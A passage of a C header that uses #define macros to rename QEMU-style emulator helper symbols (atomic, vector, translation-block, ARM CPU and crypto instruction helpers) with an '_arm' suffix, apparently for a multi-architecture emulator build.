helper_atomic_fetch_addw_le_mmu_arm #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_arm #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_arm #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_arm #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_arm #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_arm #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_arm #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_arm #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_arm #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_arm #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_arm #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_arm #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_arm #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_arm #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_arm #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_arm #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_arm #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_arm #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_arm #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_arm #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_arm #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_arm #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_arm #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_arm #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_arm #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_arm #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_arm #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_arm #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_arm #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_arm #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_arm #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_arm #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_arm #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_arm #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_arm #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_arm #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_arm #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_arm #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_arm #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_arm #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_arm #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_arm #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_arm #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_arm #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_arm #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_arm #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_arm #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_arm #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_arm #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_arm #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_arm #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_arm #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_arm #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_arm #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_arm #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_arm #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_arm #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_arm #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_arm #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_arm #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_arm #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_arm #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_arm #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_arm #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_arm #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_arm #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_arm #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_arm #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_arm #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_arm #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_arm #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_arm #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_arm #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_arm #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_arm #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_arm #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_arm #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_arm #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_arm #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_arm #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_arm #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_arm #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_arm #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_arm #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_arm #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_arm #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_arm #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_arm #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_arm #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_arm #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_arm #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_arm #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_arm #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_arm #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_arm #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_arm #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_arm #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_arm #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_arm #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_arm #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_arm #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_arm #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_arm #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_arm #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_arm #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_arm #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_arm #define helper_atomic_xchgb helper_atomic_xchgb_arm #define helper_atomic_fetch_addb helper_atomic_fetch_addb_arm #define helper_atomic_fetch_andb helper_atomic_fetch_andb_arm #define helper_atomic_fetch_orb helper_atomic_fetch_orb_arm #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_arm #define helper_atomic_add_fetchb helper_atomic_add_fetchb_arm #define helper_atomic_and_fetchb helper_atomic_and_fetchb_arm #define helper_atomic_or_fetchb helper_atomic_or_fetchb_arm #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_arm #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_arm #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_arm #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_arm #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_arm #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_arm #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_arm #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_arm #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_arm #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_arm #define helper_atomic_xchgw_le helper_atomic_xchgw_le_arm #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_arm #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_arm #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_arm #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_arm #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_arm #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_arm #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_arm #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_arm #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_arm #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_arm #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_arm #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_arm #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_arm #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_arm #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_arm #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_arm #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_arm #define helper_atomic_xchgw_be helper_atomic_xchgw_be_arm #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_arm #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_arm #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_arm #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_arm #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_arm #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_arm #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_arm #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_arm #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_arm #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_arm #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_arm #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_arm #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_arm #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_arm #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_arm #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_arm #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_arm #define helper_atomic_xchgl_le helper_atomic_xchgl_le_arm #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_arm #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_arm #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_arm #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_arm #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_arm #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_arm #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_arm #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_arm #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_arm #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_arm #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_arm #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_arm #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_arm #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_arm #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_arm #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_arm #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_arm #define helper_atomic_xchgl_be helper_atomic_xchgl_be_arm #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_arm #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_arm #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_arm #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_arm #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_arm #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_arm #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_arm #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_arm #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_arm #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_arm #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_arm #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_arm #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_arm #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_arm #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_arm #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_arm #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_arm #define helper_atomic_xchgq_le helper_atomic_xchgq_le_arm #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_arm #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_arm #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_arm #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_arm #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_arm #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_arm #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_arm #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_arm #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_arm #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_arm #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_arm #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_arm #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_arm #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_arm #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_arm #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_arm #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_arm #define helper_atomic_xchgq_be helper_atomic_xchgq_be_arm #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_arm #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_arm #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_arm #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_arm #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_arm #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_arm #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_arm #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_arm #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_arm #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_arm #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_arm #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_arm #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_arm #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_arm #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_arm #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_arm #define cpu_ldub_code cpu_ldub_code_arm #define cpu_lduw_code cpu_lduw_code_arm #define cpu_ldl_code cpu_ldl_code_arm #define cpu_ldq_code cpu_ldq_code_arm #define helper_div_i32 helper_div_i32_arm #define helper_rem_i32 helper_rem_i32_arm #define helper_divu_i32 helper_divu_i32_arm #define helper_remu_i32 helper_remu_i32_arm #define helper_shl_i64 helper_shl_i64_arm #define helper_shr_i64 helper_shr_i64_arm #define helper_sar_i64 helper_sar_i64_arm #define helper_div_i64 helper_div_i64_arm #define helper_rem_i64 helper_rem_i64_arm #define helper_divu_i64 helper_divu_i64_arm #define helper_remu_i64 helper_remu_i64_arm #define helper_muluh_i64 helper_muluh_i64_arm #define helper_mulsh_i64 helper_mulsh_i64_arm #define helper_clz_i32 helper_clz_i32_arm #define helper_ctz_i32 helper_ctz_i32_arm #define helper_clz_i64 helper_clz_i64_arm #define helper_ctz_i64 helper_ctz_i64_arm #define helper_clrsb_i32 helper_clrsb_i32_arm #define helper_clrsb_i64 helper_clrsb_i64_arm #define helper_ctpop_i32 helper_ctpop_i32_arm #define helper_ctpop_i64 helper_ctpop_i64_arm #define helper_lookup_tb_ptr helper_lookup_tb_ptr_arm #define helper_exit_atomic helper_exit_atomic_arm #define helper_gvec_add8 helper_gvec_add8_arm #define helper_gvec_add16 helper_gvec_add16_arm #define helper_gvec_add32 helper_gvec_add32_arm #define helper_gvec_add64 helper_gvec_add64_arm #define helper_gvec_adds8 helper_gvec_adds8_arm #define helper_gvec_adds16 helper_gvec_adds16_arm #define helper_gvec_adds32 helper_gvec_adds32_arm #define helper_gvec_adds64 helper_gvec_adds64_arm #define helper_gvec_sub8 helper_gvec_sub8_arm #define helper_gvec_sub16 helper_gvec_sub16_arm #define helper_gvec_sub32 helper_gvec_sub32_arm #define helper_gvec_sub64 helper_gvec_sub64_arm #define helper_gvec_subs8 helper_gvec_subs8_arm #define helper_gvec_subs16 helper_gvec_subs16_arm #define helper_gvec_subs32 helper_gvec_subs32_arm #define helper_gvec_subs64 helper_gvec_subs64_arm #define helper_gvec_mul8 helper_gvec_mul8_arm #define helper_gvec_mul16 helper_gvec_mul16_arm #define helper_gvec_mul32 helper_gvec_mul32_arm #define helper_gvec_mul64 helper_gvec_mul64_arm #define helper_gvec_muls8 helper_gvec_muls8_arm #define helper_gvec_muls16 helper_gvec_muls16_arm #define helper_gvec_muls32 helper_gvec_muls32_arm #define helper_gvec_muls64 helper_gvec_muls64_arm #define helper_gvec_neg8 helper_gvec_neg8_arm #define helper_gvec_neg16 helper_gvec_neg16_arm #define helper_gvec_neg32 helper_gvec_neg32_arm #define helper_gvec_neg64 helper_gvec_neg64_arm #define helper_gvec_abs8 helper_gvec_abs8_arm #define helper_gvec_abs16 helper_gvec_abs16_arm #define helper_gvec_abs32 helper_gvec_abs32_arm #define helper_gvec_abs64 helper_gvec_abs64_arm #define helper_gvec_mov helper_gvec_mov_arm #define helper_gvec_dup64 helper_gvec_dup64_arm #define helper_gvec_dup32 helper_gvec_dup32_arm #define helper_gvec_dup16 helper_gvec_dup16_arm #define helper_gvec_dup8 helper_gvec_dup8_arm #define helper_gvec_not helper_gvec_not_arm #define helper_gvec_and helper_gvec_and_arm #define helper_gvec_or helper_gvec_or_arm #define helper_gvec_xor helper_gvec_xor_arm #define helper_gvec_andc helper_gvec_andc_arm #define helper_gvec_orc helper_gvec_orc_arm #define helper_gvec_nand helper_gvec_nand_arm #define helper_gvec_nor helper_gvec_nor_arm #define helper_gvec_eqv helper_gvec_eqv_arm #define helper_gvec_ands helper_gvec_ands_arm #define helper_gvec_xors helper_gvec_xors_arm #define helper_gvec_ors helper_gvec_ors_arm #define helper_gvec_shl8i helper_gvec_shl8i_arm #define helper_gvec_shl16i helper_gvec_shl16i_arm #define helper_gvec_shl32i helper_gvec_shl32i_arm #define helper_gvec_shl64i helper_gvec_shl64i_arm #define helper_gvec_shr8i helper_gvec_shr8i_arm #define helper_gvec_shr16i helper_gvec_shr16i_arm #define helper_gvec_shr32i helper_gvec_shr32i_arm #define helper_gvec_shr64i helper_gvec_shr64i_arm #define helper_gvec_sar8i helper_gvec_sar8i_arm #define helper_gvec_sar16i helper_gvec_sar16i_arm #define helper_gvec_sar32i helper_gvec_sar32i_arm #define helper_gvec_sar64i helper_gvec_sar64i_arm #define helper_gvec_shl8v helper_gvec_shl8v_arm #define helper_gvec_shl16v helper_gvec_shl16v_arm #define helper_gvec_shl32v helper_gvec_shl32v_arm #define helper_gvec_shl64v helper_gvec_shl64v_arm #define helper_gvec_shr8v helper_gvec_shr8v_arm #define helper_gvec_shr16v helper_gvec_shr16v_arm #define helper_gvec_shr32v helper_gvec_shr32v_arm #define helper_gvec_shr64v helper_gvec_shr64v_arm #define helper_gvec_sar8v helper_gvec_sar8v_arm #define helper_gvec_sar16v helper_gvec_sar16v_arm #define helper_gvec_sar32v helper_gvec_sar32v_arm #define helper_gvec_sar64v helper_gvec_sar64v_arm #define helper_gvec_eq8 helper_gvec_eq8_arm #define helper_gvec_ne8 helper_gvec_ne8_arm #define helper_gvec_lt8 helper_gvec_lt8_arm #define helper_gvec_le8 helper_gvec_le8_arm #define helper_gvec_ltu8 helper_gvec_ltu8_arm #define helper_gvec_leu8 helper_gvec_leu8_arm #define helper_gvec_eq16 helper_gvec_eq16_arm #define helper_gvec_ne16 helper_gvec_ne16_arm #define helper_gvec_lt16 helper_gvec_lt16_arm #define helper_gvec_le16 helper_gvec_le16_arm #define helper_gvec_ltu16 helper_gvec_ltu16_arm #define helper_gvec_leu16 helper_gvec_leu16_arm #define helper_gvec_eq32 helper_gvec_eq32_arm #define helper_gvec_ne32 helper_gvec_ne32_arm #define helper_gvec_lt32 helper_gvec_lt32_arm #define helper_gvec_le32 helper_gvec_le32_arm #define helper_gvec_ltu32 helper_gvec_ltu32_arm #define helper_gvec_leu32 helper_gvec_leu32_arm #define helper_gvec_eq64 helper_gvec_eq64_arm #define helper_gvec_ne64 helper_gvec_ne64_arm #define helper_gvec_lt64 helper_gvec_lt64_arm #define helper_gvec_le64 helper_gvec_le64_arm #define helper_gvec_ltu64 helper_gvec_ltu64_arm #define helper_gvec_leu64 helper_gvec_leu64_arm #define helper_gvec_ssadd8 helper_gvec_ssadd8_arm #define helper_gvec_ssadd16 helper_gvec_ssadd16_arm #define helper_gvec_ssadd32 helper_gvec_ssadd32_arm #define helper_gvec_ssadd64 helper_gvec_ssadd64_arm #define helper_gvec_sssub8 helper_gvec_sssub8_arm #define helper_gvec_sssub16 helper_gvec_sssub16_arm #define helper_gvec_sssub32 helper_gvec_sssub32_arm #define helper_gvec_sssub64 helper_gvec_sssub64_arm #define helper_gvec_usadd8 helper_gvec_usadd8_arm #define helper_gvec_usadd16 helper_gvec_usadd16_arm #define helper_gvec_usadd32 helper_gvec_usadd32_arm #define helper_gvec_usadd64 helper_gvec_usadd64_arm #define helper_gvec_ussub8 helper_gvec_ussub8_arm #define helper_gvec_ussub16 helper_gvec_ussub16_arm #define helper_gvec_ussub32 helper_gvec_ussub32_arm #define helper_gvec_ussub64 helper_gvec_ussub64_arm #define helper_gvec_smin8 helper_gvec_smin8_arm #define helper_gvec_smin16 helper_gvec_smin16_arm #define helper_gvec_smin32 helper_gvec_smin32_arm #define helper_gvec_smin64 helper_gvec_smin64_arm #define helper_gvec_smax8 helper_gvec_smax8_arm #define helper_gvec_smax16 helper_gvec_smax16_arm #define helper_gvec_smax32 helper_gvec_smax32_arm #define helper_gvec_smax64 helper_gvec_smax64_arm #define helper_gvec_umin8 helper_gvec_umin8_arm #define helper_gvec_umin16 helper_gvec_umin16_arm #define helper_gvec_umin32 helper_gvec_umin32_arm #define helper_gvec_umin64 helper_gvec_umin64_arm #define helper_gvec_umax8 helper_gvec_umax8_arm #define helper_gvec_umax16 helper_gvec_umax16_arm #define helper_gvec_umax32 helper_gvec_umax32_arm #define helper_gvec_umax64 helper_gvec_umax64_arm #define helper_gvec_bitsel helper_gvec_bitsel_arm #define cpu_restore_state cpu_restore_state_arm #define page_collection_lock page_collection_lock_arm #define page_collection_unlock page_collection_unlock_arm #define free_code_gen_buffer free_code_gen_buffer_arm #define tcg_exec_init tcg_exec_init_arm #define tb_cleanup tb_cleanup_arm #define tb_flush tb_flush_arm #define tb_phys_invalidate tb_phys_invalidate_arm #define tb_gen_code tb_gen_code_arm #define tb_exec_lock tb_exec_lock_arm #define tb_exec_unlock tb_exec_unlock_arm #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_arm #define tb_invalidate_phys_range tb_invalidate_phys_range_arm #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_arm #define tb_check_watchpoint tb_check_watchpoint_arm #define cpu_io_recompile cpu_io_recompile_arm #define tb_flush_jmp_cache tb_flush_jmp_cache_arm #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_arm #define translator_loop_temp_check translator_loop_temp_check_arm #define translator_loop translator_loop_arm #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_arm #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_arm #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_arm #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_arm #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_arm #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_arm #define unassigned_mem_ops unassigned_mem_ops_arm #define floatx80_infinity floatx80_infinity_arm #define dup_const_func dup_const_func_arm #define gen_helper_raise_exception gen_helper_raise_exception_arm #define gen_helper_raise_interrupt gen_helper_raise_interrupt_arm #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_arm #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_arm #define gen_helper_cpsr_read gen_helper_cpsr_read_arm #define gen_helper_cpsr_write gen_helper_cpsr_write_arm #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_arm #define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_arm #define arm_cpu_update_virq arm_cpu_update_virq_arm #define arm_cpu_update_vfiq arm_cpu_update_vfiq_arm #define arm_cpu_initfn arm_cpu_initfn_arm #define gt_cntfrq_period_ns gt_cntfrq_period_ns_arm #define arm_cpu_post_init arm_cpu_post_init_arm #define arm_cpu_realizefn arm_cpu_realizefn_arm #define a15_l2ctlr_read a15_l2ctlr_read_arm #define arm_cpu_class_init arm_cpu_class_init_arm #define cpu_arm_init cpu_arm_init_arm #define helper_crypto_aese helper_crypto_aese_arm #define helper_crypto_aesmc helper_crypto_aesmc_arm #define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_arm #define helper_crypto_sha1h helper_crypto_sha1h_arm #define helper_crypto_sha1su1 helper_crypto_sha1su1_arm #define helper_crypto_sha256h helper_crypto_sha256h_arm #define helper_crypto_sha256h2 helper_crypto_sha256h2_arm #define helper_crypto_sha256su0 helper_crypto_sha256su0_arm #define helper_crypto_sha256su1 helper_crypto_sha256su1_arm #define helper_crypto_sha512h helper_crypto_sha512h_arm #define helper_crypto_sha512h2 helper_crypto_sha512h2_arm #define helper_crypto_sha512su0 helper_crypto_sha512su0_arm #define helper_crypto_sha512su1 helper_crypto_sha512su1_arm #define helper_crypto_sm3partw1 helper_crypto_sm3partw1_arm #define helper_crypto_sm3partw2 helper_crypto_sm3partw2_arm #define helper_crypto_sm3tt helper_crypto_sm3tt_arm #define helper_crypto_sm4e helper_crypto_sm4e_arm #define helper_crypto_sm4ekey helper_crypto_sm4ekey_arm #define 